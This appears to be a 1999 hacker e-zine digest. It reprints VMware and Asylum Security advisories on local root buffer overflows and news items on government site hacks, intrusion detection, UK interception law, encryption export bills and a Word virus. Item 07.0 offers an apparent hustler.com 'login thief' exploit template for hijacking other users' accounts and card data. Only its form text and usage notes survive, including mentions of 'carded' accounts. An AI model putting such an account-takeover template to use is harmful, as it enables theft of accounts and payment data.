-------------------------------------------------------------------- Darin White d.w@ibm.net -------------------------------------------------------------------- @HWA 06.0 VMware Security Alert ~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Date: Fri, 25 Jun 1999 19:18:35 -0700 From: Jason R. Rhoads To: BUGTRAQ@netspace.org Subject: VMware Security Alert "On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users." http://www.vmware.com/news/security.html ----------------------------------------------------------------------------- VMware Security Alert Date: June 25th, 1999 On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users. Vulnerable Systems The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole does not allow direct network based 'worm' style attacks against VMware. This security hole was discovered by Asylum Security, a division of CyberSpace 2000, a professional computer security response team. VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been suspended and the inventory discarded. Customers who have purchased VMware for have been notified by electronic mail, VMware has also posted security alerts to newsgroups at news.vmware.com. Affected VMware Releases This security hole is present in VMware for Linux 1.0.1 and all previous versions, including the beta versions (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with fixes for this security hole will be made available in the near future. How to Close this Security Hole The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2: 1.Download VMware for Linux 1.0.2 from one of our mirror sites 2.Untar the distribution. tar zxvf vmware-1.0.2.tar.gz 3.Change directory to vmware-install cd vmware-install 4.As root, install VMware for Linux su ./install.pl You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and then follow any installer instructions. NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from the VMware executable. VMware must be suid root to run correctly. Reporting Security Issues VMware is committed to addressing security issues and providing customers with information on how they can protect themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to security@vmware.com. We will work to appropriately address and communicate the issue. Notification of Security Alerts When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site and newsgroups at news.vmware.com. ----------------------------------------------------------------------------- Date: Sat, 26 Jun 1999 17:33:22 -0400 From: Don To: BUGTRAQ@netspace.org Subject: VMWare Advisory - buffer overflows This advisory was made on 06/21/99 and was to be released on 06/28/99 (or after a fix was released). We would like to recognize the VMware staff and their responsiveness to the bug reports. Last night, customers who purchased their product received notices to upgrade to VMware v1.0.2. For more information on the VMware bugs, visit: http://www.vmware.com/news/security.html http://www.cyberspace2000.com/security/advisories -Don Sausa ----------[asylum security]------------ id: #99021, team director e-mail: don@cyberspace2000.com web: http://cyberspace2000.com/security --------------------------------------- Team Asylum Security Copyright (c) 1999 By CyberSpace 2000 http://www.cyberspace2000.com/security Source: Seth L. [seth@cyberspace2000.com] Advisory Date: 06/21/99 Release Date: 06/28/99 [ Final Revision: 06/25/99 ] Affected -------- VMware v1.0.1 and earlier for Linux. Product Description ------------------- VMware v1.0.1 is a software product by VMware, Inc. that creates a virtual machine in which you can install multiple operating systems without repartitioning or formatting your hard drive. Vulnerability Summary --------------------- Team Asylum has found multiple buffer overflows existing in VMware v1.0.1 for Linux. Earlier versions also have the same buffer overflows. VMware Inc. has been notified of these overflows and they have released VMware v1.0.2 as a fix. Any local user can exploit these overflows to gain root access. Fix --- All users are encouraged to upgrade to VMware v1.0.2. You may download it directly off http://www.vmware.com. Special Thanks -------------- Special thanks to VMware staff for responding quickly to our bug reports. Within 3 days, they have managed to fix the overflows, as well as stop the physical distribution of their v1.0.1 product. All customers who have purchased VMware have been notified as of 06/25/99 12:00 midnight (PST) about the new VMware v1.0.2 version. @HWA 07.0 Security vulnerability in hustler.com login template ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ security vulnerability in hustler.com which allows any user to steal another users account and gain access to full access to their account including cc# information no fix yet. hustler.com has been informed. ---------------------------------------------------------------------------- exploit template ---------------------------------------------------------------------------- HUSTLER LOGIN THEIF BY EGODEATH

HACKED

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID:	This is the hustler account thief script in order for this to work you must know somones real login name ( if its an old carded account with a nick like XTC, give up you cant steal a froozen account, but yea.. u can change its password...
Enter Your New Password	Enter Password again

@HWA 08.0 DOD investigating computer 'Mob-like' tactics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 30, 1999 . . . 12:25 EDT DOD investigating computer 'mob tactics' BY DANIEL VERTON (dan_verton@fcw.com) While a senior adviser to the Defense Department testified before Congress this week on threats to national security stemming from the export of powerful computer technology, his supervisor allegedly attempted to access and tamper with his computer, prompting the immediate launch of a full-scale investigation. Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee, said Jay Davis, director of the Defense Threat Reduction Agency, informed the committee on June 28 that an investigation was under way into an incident involving unauthorized access to the computer belonging to a senior strategic trade adviser to the agency. According to Burton, the incident took place while Peter Leitner, a longtime internal critic of DOD's policy on exporting sensitive computer technologies, was testifying on June 24 before the committee regarding security problems stemming from that policy. Although no details from the investigation have been released yet, Burton claims that the incident is an example of DOD officials trying to strong-arm a congressional witness into not cooperating with the committee. "While Dr. Leitner was telling my committee about the retaliation he suffered for bringing his concerns to his superiors and Congress, his supervisor was trying to secretly access his computer," Burton said. "This smacks of mob tactics. Congress will not stand for this kind of witness intimidation." Although DTRA has launched an investigation into the incident, Burton said he plans to call upon Defense Secretary William Cohen to ask for "his personal involvement" in the case. "I intend to ask a lot of questions of the Defense Department officials involved, and I expect to get straight answers," Burton said. Leitner has criticized the department's policy of easing export controls on powerful computer technology that is used to simulate and test the reliability of nuclear weapons, claiming that the acquisition of supercomputer technology abroad was feeding a new form of Cold War characterized by an arms race for "virtual weapons." @HWA 09.0 GSA announces Intrusion Detection Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 28, 1999 GSA launches intrusion-detection net BY DIANE FRANK (diane_frank@fcw.com) The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it goes...so that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." @HWA 10.0 Nasa servers reportedly hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.newsbytes.com/pubNews/132718.html 30 Jun 1999, 10:51 AM CST By David McGuire, Newsbytes. MINNEAPOLIS, MINNESOTA, U.S.A., . In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday. "There is some indication that a couple servers at the Marshal Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today. While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshal attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes. Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts. The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday. "We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly." The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday. Sunday's attack was the first successful crack of the Army's main site, located at http://www4.army.mil . The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks. Reported by Newsbytes.com, http://www.newsbytes.com . 10:51 CST Reposted 10:59 CST @HWA 11.0 UK May Force ISPs to Install Taps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by Weld Pond The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. Theses new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS)an exclusive FBI funded group that meets in secret. Tech Web http://www.techweb.com/news/story/TWB19990625S0019 U.K. Wants ISPs To Build In Interception (06/25/99, 3:40 p.m. ET) By Duncan Campbell, TechWeb The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance. Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems. The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret. The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement. According to this week's "white paper," every type of network will be covered, including VPNsoperated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says. Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order. Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted. "This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts." This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses. A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems. The British government said the new law would make full provision for human-rights legislation, Straw said. But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods. For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" he asked. @HWA 12.0 Crypto Tie Downs Loosened ~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by mortel Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah! CNN http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/ U.S. committees approve encryption bill by Elinor Mills Abreu From... (IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes. The government argues that it needs to control the export of strong encryption for national security. Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism. The amendments approved by the House committee would do several things: require that a comparable encryption product be available in a country outside the U.S. in order for a U.S. company to export similar technology there; bar export to the People's Liberation Army or the Communist Military in China; allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities; require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data. Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length. In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country. An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002. "The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S. producers the ability to compete globally if similar products are already being offered by foreign companies." On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce. The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography. Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies. The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data. Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capital Hill." While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson. Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said. "Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids." Other committees may review these bills before they go to the floor of the two houses for a vote, he said. @HWA 13.0 Heathen.A Spreads Through Word Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by nvirb While not intentionally malicious or as fast spread as Melissa or WormExplorer Heathen.A is latest threat to computer users. Heathen.A is considered to be a multipartite virus and only infects only Word97 files. PC World http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html Heathen.A Is at the Gates Keep a lookout: There's a new bug in town. by Matthew Nelson, InfoWorld Electric June 25, 1999, 4:50 p.m. PT SAN MATEO, CALI